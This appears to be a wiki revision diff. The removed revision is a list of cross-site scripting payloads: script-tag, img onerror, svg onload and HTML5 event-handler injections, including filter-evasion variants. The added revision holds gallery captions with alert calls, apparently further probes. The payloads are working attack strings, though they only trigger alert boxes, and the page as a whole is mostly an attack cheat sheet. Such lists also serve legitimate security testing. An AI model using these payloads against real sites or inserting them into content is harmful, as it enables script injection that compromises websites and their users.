|
|
| (2 intermediate revisions by the same user not shown) |
| Line 1: |
Line 1: |
| <script>alert('XSS')</script> | | <gallery> |
| <scr<script>ipt>alert('XSS')</scr<script>ipt>
| | File:Example.jpg|alert(1); |
| "><script>alert('XSS')</script>
| | File:Example.jpg|alert(2); |
| "><script>alert(String.fromCharCode(88,83,83))</script>
| | </gallery> |
| | |
| Img payload
| |
| <img src=x onerror=alert('XSS');>
| |
| <img src=x onerror=alert('XSS')//
| |
| <img src=x onerror=alert(String.fromCharCode(88,83,83));>
| |
| <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
| |
| <img src=x:alert(alt) onerror=eval(src) alt=xss>
| |
| "><img src=x onerror=alert('XSS');>
| |
| "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
| |
| | |
| Svg payload
| |
| <svg onload=alert(1)>
| |
| <svg/onload=alert('XSS')>
| |
| <svg onload=alert(1)//
| |
| <svg/onload=alert(String.fromCharCode(88,83,83))>
| |
| <svg id=alert(1) onload=eval(id)>
| |
| "><svg/onload=alert(String.fromCharCode(88,83,83))>
| |
| "><svg/onload=alert(/XSS/)
| |
| | |
| XSS for HTML5
| |
| | |
| <body onload=alert(/XSS/.source)>
| |
| <input autofocus onfocus=alert(1)>
| |
| <select autofocus onfocus=alert(1)>
| |
| <textarea autofocus onfocus=alert(1)>
| |
| <keygen autofocus onfocus=alert(1)>
| |
| <video/poster/onerror=alert(1)>
| |
| <video><source onerror="javascript:alert(1)">
| |
| <video src=_ onloadstart="alert(1)">
| |
| <details/open/ontoggle="alert'1'">
| |
| <audio src onloadstart=alert(1)>
| |
| <marquee onstart=alert(1)>
| |
